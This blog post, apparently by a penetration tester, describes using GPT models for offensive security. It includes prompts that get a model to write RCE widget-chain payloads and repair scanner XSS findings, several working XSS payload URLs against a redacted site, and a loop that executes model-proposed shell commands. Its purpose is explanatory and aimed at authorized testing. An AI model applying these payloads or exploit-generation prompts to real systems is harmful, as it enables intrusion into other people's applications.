Ever since the day I had GPT-4 write a widget chain in five minutes for an old 0-day that originally took me two or three work days to create (CVE-2021-42777), I've been humbled by the power of AI automation that "understands" the context of various offensive security situations. This is probably going to sound like hype, so we're going to stick to practical examples that have actually resulted in exploits. AI is just another tool in the hacker toolbox. As always, we as ethical hackers strive to mimic criminals by aiming for low-effort, high-impact attacks, and that certainly includes the use of AI (and specifically generative AI, for its contextual abilities). By "context" I mean a few different situations, so I'll talk through examples of each one:
Payload Technical Requirements Context
For example, in that CVE-2021-42777 scenario, there were plenty of trial-and-error tasks I did manually that could have been automated - specifically, discovering the constraints the injectable field imposed on the payload, like: "it must not contain curly braces", "it must be one line of C#", "it must return an object", etc. Instead of automating that trial-and-error recon, though, I chose to give the hardest part to the machine: the mental gymnastics of crafting a command that would fit all of those discovered payload requirements. I assumed it should be able to create a one-liner widget chain that would be useful for remote code execution. Well, I was not disappointed. It created a perfectly viable widget chain that met all of the requirements necessary to own the server in ONE PROMPT (where GPT-3.5 took about 30 prompts).
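A reconstruction of roughly what that kind of prompt looks like - not the exact one I used, since the real target details are redacted, but the discovered requirements simply become the context:
you are an expert application security researcher.
write a single line of C# that forms a widget chain suitable for remote code execution, under these constraints:
it must not contain curly braces
it must be one line of C#
it must return an object
[ANY OTHER RESTRICTIONS DISCOVERED DURING RECON]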
Traditionally, there was no reference or way to "google" how to write a 0-day like this - it essentially has to be created for the first time. Enter generative AI. Based on this experience (and as a fairly new prompt engineer myself), I predict a lot of non-coding hackers will become very good at creating low-level technical 0-days (of all types, not just widget chain RCEs), all because of access to this technology.
Exploit Brainstorming Context
Context is not limited to the reconnaissance phase, either. I have used it for other types of research: brainstorming techniques for specialized XSS (e.g. expanding this one to be more generalized across many types of fields and field validation, so it could be sprayed across many targets for bug bounties).
Business Logic Context
Inspired by a Dan Miessler podcast, I had GPT find and review the manual for a product that I was trying to exploit. It will give you a list of what you're "not supposed to be able to do" and that becomes your hacking "to do" list!
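A rough sketch of that kind of prompt (the wording here is illustrative, not the exact one I used):
you are an excellent cybersecurity researcher.
here is the manual for [PRODUCT]. list everything the manual says a user is not supposed to be able to do, every action reserved for administrators, and every warning about misconfiguration. format the list as test cases I can try against the application.
[MANUAL TEXT OR LINK HERE]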
Decision Making / Autonomous Hacking
An LLM can pick the next direction on a pen test too, of course. I don't mean PentestGPT, which is very manually guided... in the early days of GPT, I built a tool for autonomously moving through a target, prompting itself to ask the next question about the next possible hack. There are so many possible ways to hack a system, and it only needs to get one right to add a finding to a report, after all. Knowing this, I didn't mind the hallucinations or false attempts that much (as long as it could test and validate itself). Nowadays there are likely better tools than the one I made (in fact, one of the HOPE attendees reached out after my talk to tell me about RunSybil).
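That early tool is long gone, but the core loop is simple enough to sketch. The following is a minimal illustration of the self-prompting idea rather than the system I actually built - it assumes the openai Python package, a lab target you're authorized to test, and a human approving every command before it runs:

import subprocess
from openai import OpenAI

client = OpenAI()  # assumes OPENAI_API_KEY is set in the environment
history = ["Target: 10.0.0.5 (authorized lab machine). No steps taken yet."]

for step in range(10):
    prompt = (
        "you are a penetration tester working through an authorized lab target.\n"
        "here is everything tried so far and the output of each step:\n"
        + "\n".join(history)
        + "\npropose the single next command to run and note what finding it would validate. "
          "reply with the command alone on the first line."
    )
    reply = client.chat.completions.create(
        model="gpt-4o",  # placeholder model name
        messages=[{"role": "user", "content": prompt}],
    ).choices[0].message.content
    command = reply.splitlines()[0].strip()

    # keep a human in the loop: hallucinated or destructive suggestions get skipped
    if input("run '%s'? [y/N] " % command).lower() != "y":
        history.append("SKIPPED: " + command)
        continue

    result = subprocess.run(command, shell=True, capture_output=True, text=True, timeout=120)
    history.append("$ " + command + "\n" + result.stdout + result.stderr)

The approval step is the whole point: the model is allowed to be wrong often, because each suggestion is cheap to test or skip.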
Technical Inventory Vulnerabilities Context
How great would it have been if we'd had GPT during the Log4j saga? Imagine just asking, across your whole inventory, "are there any systems whose dependencies of dependencies (and so on) use a Java logger?" Even with manual validation, that would have saved so much research time!
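A rough sketch of what that question could look like in practice, assuming you've already dumped each system's transitive dependency tree (say, mvn dependency:tree output) into a folder of text files - the paths, model name, and wording are all illustrative:

from pathlib import Path
from openai import OpenAI

client = OpenAI()

for tree_file in Path("dependency-trees").glob("*.txt"):
    question = (
        "you are helping with a software inventory review.\n"
        "does the following dependency tree pull in a Java logging library, directly "
        "or through dependencies of dependencies? if so, name the library, its version, "
        "and the path through the tree.\n\n" + tree_file.read_text()
    )
    answer = client.chat.completions.create(
        model="gpt-4o",  # placeholder model name
        messages=[{"role": "user", "content": question}],
    ).choices[0].message.content
    print("--- " + tree_file.name + " ---\n" + answer + "\n")

Every answer still needs manual validation (and very large trees need chunking), but it turns days of research into a review task. Also, speaking of validation...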
Burp Suite Scanner Exploit Validation
This is an XSS success story from a web application penetration test I recently completed as part of my consulting work. False positives aren't a new issue with scanners like Burp Suite's crawl and audit... but validating them with GPT certainly is! Here's how it works:
Originally, this XSS payload provided by the Burp Suite audit didn't launch:
https://REDACTED.COM/w/widget-settings-menu?type=panelWidgetSettings20454%3balert(1)%2f%2f663dtm5&panelOpts%5BdialogOpts%5D%5Btitle%5D=Widget+Setting
While trying to fix it so it would execute, I took a look at the source of the page it was injecting into and found the problem. After a few tweaks, I could see the payload wasn't properly escaping out of the JavaScript:
<html>
<script>
(function() {
var opts67286f10 = {"dialogOpts":{"title":"Widget Setting","width":"900","height":"600"},"controller":"patient","action":"index","openTrigger":"openSettings","pre-name":"widget-settings","headerText":""};
$("#widget-settings-panel").panelWidgetSettings2054;alert(1)//663dtm5(opts2865e6f10);}());
</script> </html>
So, I changed it manually by adding a </script> escape:
https://REDACTED.COM/w/widget-settings-menu?type=%3Ca%20href=%22yo%22%3EsdfSdfsdfsf%3C/a%3E}%3C/scrIpt%3E%3CscriPt%3Ealert(999)%3C/Script%3E&panelOptions[dialogOptions][title]=Widget+Setting
And... success!
But I couldn't help but wonder... I had a LOT more findings like this. Could I automate GPT-4 validating them? It's also very good at coding, so couldn't it fix each payload if, like in the 0-day story, the right requirements were provided as context?
I made a generalized prompt like this:
you are an excellent cybersecurity researcher.
knowing that the following web app likely has a [VULNERABILITY TYPE] issue, how can this payload be adjusted to exploit it, since the following payload doesn't launch it?
[PAYLOAD HERE]
the html of the web page:
[THE HTML CODE FROM THE PAGE]
In this case, after the GPT API tooling has filled in the placeholders using information from the Burp Suite audit finding output, the raw prompt looks like this:
you are an excellent cybersecurity researcher.
knowing that the following snippet of the html page likely has a xss issue, how can this url be adjusted to launch the xss, since the following payload doesn't launch?
w/widget-settings-menu?type=panelWidgetSettings204%3balert(1)%2f%2f663dkktm5&panelOptions%5BdialogOptions%5D%5Btitle%5D=Widget+Setting
the snippet of html that contains javascript:
<html>
<script>
(function() {
var opts67286f10 = {"dialogOptions":{"title":"Widget Setting","width":"900","height":"600"},"controller":"patient","action":"index","openTrigger":"openSettings","pre-name":"widget-settings","headerText":""};
$("#widget-settings-panel").panelWidgetSettings2054;alert(1)//663dkktm5(options2865e6f10);}());
</script> </html>
It had great results! Here's the payload it generated, produced much faster than it would have taken me to do the validation manually:
https://REDACTED.COM/widgets/widget-settings-menu?type=panelWidgetSettings20454%3B%7D%29%3Balert%281%29%3B%28function%28%29%7B&panelOptions[dialogOptions][title]=Widget+Setting
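For the curious, the placeholder-filling tooling behind this doesn't need to be fancy. Here's a simplified sketch of that piece - the helper function and file handling are illustrative, and in the real workflow the inputs come straight out of the Burp Suite finding:

from openai import OpenAI

client = OpenAI()

PROMPT_TEMPLATE = """you are an excellent cybersecurity researcher.
knowing that the following web app likely has a {vuln_type} issue, how can this payload be adjusted to exploit it, since the following payload doesn't launch it?
{payload}
the html of the web page:
{page_html}"""

def suggest_fixed_payload(vuln_type, payload, page_html):
    # fill the generalized template with one scanner finding and ask for a working payload
    prompt = PROMPT_TEMPLATE.format(vuln_type=vuln_type, payload=payload, page_html=page_html)
    reply = client.chat.completions.create(
        model="gpt-4o",  # placeholder model name
        messages=[{"role": "user", "content": prompt}],
    )
    return reply.choices[0].message.content

# one finding at a time: the suggested payload still gets replayed in the browser
# (or Repeater) to confirm it actually fires before it goes in the report
print(suggest_fixed_payload(
    vuln_type="xss",
    payload="w/widget-settings-menu?type=panelWidgetSettings204%3balert(1)%2f%2f663dkktm5&panelOptions%5BdialogOptions%5D%5Btitle%5D=Widget+Setting",
    page_html=open("finding_page.html").read(),  # hypothetical saved response body
))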
I have written a lot of GPT-powered tools in the last year for work, consulting, and personal use, and if it's not clear by now: this is not a trend, and it's not slowing down. I'm blown away every day by what these systems are able to do with the right prompt engineering. One day, I bet coding will be a quaint old-fashioned hobby like knitting - some people will still do it, but mostly for fun, because we have knitting machines to make most sweaters. It makes me hopeful that hackers will get to spend more time on the creative, open-ended hacks that are harder to get the AI to do... like using the free trial version of software to get around encryption (like this one), and less time on eye-bleeding activities like widget chains, scanner validation, or fiddling with XSS syntax and worn-in payload lists that well-known patches already defend against (GPT can remix those payloads in a context-dependent way, of course!). But who knows, maybe with the right prompts the machine will do the outside-of-the-box hacks as well!
It looks like there isn't already a GPT-powered scanner validation Burp Suite extension, so I should probably write one. (Disclaimer: if you are interested in writing tools like this, be aware that this sort of functionality usually requires a private instance of an AI model to help prevent sensitive data leakage - never use public AI chat systems for sensitive work.)
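If I do, the skeleton would probably start out something like this: a bare Jython sketch against Burp's legacy Extender API that just collects what the validation prompt needs, with the model call (to a privately hosted instance, per the disclaimer) left as a stub:

from burp import IBurpExtender, IScannerListener

class BurpExtender(IBurpExtender, IScannerListener):
    def registerExtenderCallbacks(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
        callbacks.setExtensionName("GPT scanner validator (sketch)")
        callbacks.registerScannerListener(self)

    def newScanIssue(self, issue):
        # fires on every new scanner finding: gather the pieces the prompt template needs
        name = issue.getIssueName()
        url = str(issue.getUrl())
        messages = issue.getHttpMessages()
        page_html = ""
        if messages and messages[0].getResponse():
            page_html = self._helpers.bytesToString(messages[0].getResponse())
        # TODO: fill the prompt template with (name, url, page_html), send it to the
        # private model endpoint, and surface the suggested payload for manual replay
        self._callbacks.printOutput("candidate for GPT validation: " + name + " at " + url)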